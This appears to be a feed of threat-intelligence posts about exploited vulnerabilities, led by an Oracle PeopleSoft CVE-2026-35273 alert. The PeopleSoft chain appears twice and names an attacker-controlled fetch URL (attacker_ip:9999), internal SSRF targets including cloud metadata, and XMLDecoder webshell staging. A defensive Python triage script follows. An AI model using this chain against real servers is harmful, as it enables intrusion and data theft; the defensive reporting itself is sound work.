🚨 KEVIntel Honeypot Alert
KEVIntel observed activity targeting Oracle PeopleSoft via:
POST /PSIGW/HttpListeningConnector
This is one of the key PeopleSoft endpoints highlighted by Google Mandiant in its reporting on CVE-2026-35273 exploitation by UNC6240 / ShinyHunters. The activity is consistent with exploitation attempts against the same Environment Management / Integration Broker attack surface described in that campaign.
At this stage, we are treating the activity as consistent with reported CVE-2026-35273 targeting, not as confirmed attribution to the same threat actor. We are continuing to track this activity across KEVIntel sensors.
🚨 ShinyHunters is exploiting an Oracle PeopleSoft vulnerability (CVE-2026-35273) as part of an extortion campaign targeting higher education. Read the full analysis, and get IOCs and remediation guidance to stay ahead of the threat: goo.gle/4e52jOz
Based on KEVIntel honeypot logs and the Mandiant report, I believe this is potentially the CVE-2026-35273 chain used, but not 100% on all details.
1. Attacker sends POST /PSEMHUB/hub with environment-management actions (updateEnvironment, fetchEnvironment, syncEnvironment) and an attacker-controlled sourceURL (http://attacker_ip:9999/hub_update).
1.1 The hub fetches and processes environment metadata/updates from attacker-controlled sourceURL.
1.2 Malicious content is staged on disk under PSEMHUB.war/envmetadata/ (transactions, environment XML).
1.3 RCE follows when that content is processed. Mandiant observed XMLDecoder abuse via envmetadata/data/environment/*.xml on app restart, plus unexpected .jsp webshells.
2. Integration Broker SSRF. POST /PSIGW/HttpListeningConnector with sourceURL targets including:
- WebLogic admin console (127[.]0.0.1:7001/console)
- Internal PeopleSoft services (127[.]0.0.1:51500/pspc/services/AdminService)
- Cloud metadata endpoint (169[.]254.169.254)
Based on KEVIntel honeypot logs and the Mandiant report, I believe this is the CVE-2026-35273 chain used, but not 100% on all details.
1. Attacker sends POST /PSEMHUB/hub with environment-management actions (updateEnvironment, fetchEnvironment, syncEnvironment) and an attacker-controlled remote sourceURL (http://attacker_ip:9999/hub_update).
1.1 The hub fetches and processes environment metadata/updates from remote attacker-controlled sourceURL.
1.2 Malicious content is staged on disk under PSEMHUB.war/envmetadata/ (transactions, environment XML).
1.3 RCE follows when that content is processed. Mandiant observed XMLDecoder abuse via envmetadata/data/environment/*.xml on app restart, plus unexpected .jsp webshells.
2. Integration Broker SSRF. POST /PSIGW/HttpListeningConnector with sourceURL targets including:
- WebLogic admin console (127[.]0.0.1:7001/console)
- Internal PeopleSoft services (127[.]0.0.1:51500/pspc/services/AdminService)
- Cloud metadata endpoint (169[.]254.169.254)
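A defender-side triage of captured requests for the two endpoints and the sourceURL targets described in the post above. This is an added example, not code from the post, KEVIntel or Mandiant; the `key=value` request-body layout and the sample records are constructed assumptions, since the posts do not show the wire format.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Endpoints and action names are the ones named in the posts above.
WATCHED = {"/PSEMHUB/hub", "/PSIGW/HttpListeningConnector"}
EM_ACTIONS = ("updateEnvironment", "fetchEnvironment", "syncEnvironment")
# Assumption: sourceURL appears as a key followed closely by an http(s) URL.
URL_RE = re.compile(r"sourceURL\W{1,4}(https?://[^\s\"'<>&]+)", re.I)

def classify_target(url):
    """Say where a sourceURL points: loopback, link-local, private or external."""
    host = urlsplit(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a hostname, not an IP literal
        return "loopback" if host.lower() == "localhost" else "external"
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:  # 169.254.0.0/16, includes the cloud metadata address
        return "link-local"
    return "private" if ip.is_private else "external"

def triage(method, path, body):
    """Return a finding for a POST to a watched endpoint, else None."""
    path = path.split("?", 1)[0]
    if method.upper() != "POST" or path not in WATCHED:
        return None
    targets = [(u, classify_target(u)) for u in URL_RE.findall(body)]
    if any(kind != "external" for _, kind in targets):
        severity = "ssrf-internal"   # server asked to reach its own network
    elif targets:
        severity = "remote-source"   # server asked to fetch remote content
    else:
        severity = "probe"
    return {"endpoint": path, "severity": severity, "targets": targets,
            "actions": [a for a in EM_ACTIONS if a in body]}

def triage_all(records):
    return [f for f in (triage(*r) for r in records) if f]

# Constructed sample records (method, path, body); not real traffic.
SAMPLE = [
    ("POST", "/PSEMHUB/hub",
     "action=updateEnvironment&sourceURL=http://host.example.invalid:9999/hub_update"),
    ("POST", "/PSIGW/HttpListeningConnector", "sourceURL=http://127.0.0.1:7001/console"),
    ("POST", "/PSIGW/HttpListeningConnector", "sourceURL=http://169.254.169.254/"),
    ("GET", "/PSEMHUB/hub", ""),
    ("POST", "/index.html", "sourceURL=http://127.0.0.1/"),
]
```

Findings from the request side are worth pairing with a file-integrity check on `PSEMHUB.war/envmetadata/` and a search for unexpected `.jsp` files, the on-disk artifacts the post attributes to Mandiant's observations.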
This week at KEVIntel:
• 35 new Known Exploited Vulnerabilities added
• 30 beyond CISA KEV
• 5 listed in CISA KEV
• 10 hours faster than CISA KEV on average
• 9 different KEVs exploited across our honeypot sensors
• 236 verified exploitation attempts from 15 unique attacker IPs
We also detected exploitation of Fortinet FortiSandbox CVE-2026-39808 in the wild for the first time across our telemetry.
CISA KEV is the baseline. KEVIntel helps teams go further with earlier signals, proprietary sensor telemetry, and exploited vulnerability intelligence beyond the official catalog. And we're just getting warm!
Starting to see in the wild exploitation ramp up for Critical Ivanti Sentry Unauth RCE (CVE-2026-10520) Some example payloads being used by attackers:
Vendors are still hiding security advisories behind customer portals
🛡️ We added Arista EOS vulnerability CVE-2026-7473, Google Chromium V8 vulnerability CVE-2026-11645, & Cisco Catalyst vulnerability CVE-2026-20245 to our KEV Catalog. Visit go.dhs.gov/Z3Q & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec
Happy Patch Tuesday! 🎉 Let's see which of these end up on kevintel.com
CVE-2026-50751 was added to KEVIntel 6 hours before CISA KEV
Exploited in the wild since May 7th 2026!
Checkpoint User Authentication Bypass in VPN Remote Access and Mobile Access - CVE-2026-50751
Financially motivated, uses Qilin ransomware. IoCs included.
kevintel.com/CVE-2026-50751
blog.checkpoint.com/security…
New private PoC added for CVE-2026-8054. Unauthenticated SQL Injection in the dotCMS Publish Audit API.
Affected endpoints:
POST /api/auditPublishing/getAll
POST /api/auditPublishing/get
Affected versions: dotCMS Core 25.11.04-1 through 26.04.28-02
Fixed:
26.04.28-03
26.05.06-01
LTS releases are not affected.
We have not yet observed exploitation against KEVIntel honeypots, but with a private PoC now available, exploitation attempts are likely only a matter of time.
Available now for KEVIntel Pro users: kevintel.com/CVE-2026-8054
I have "Boat party" in my calendar for today but can't remember why, where, or who with 🤦‍♂️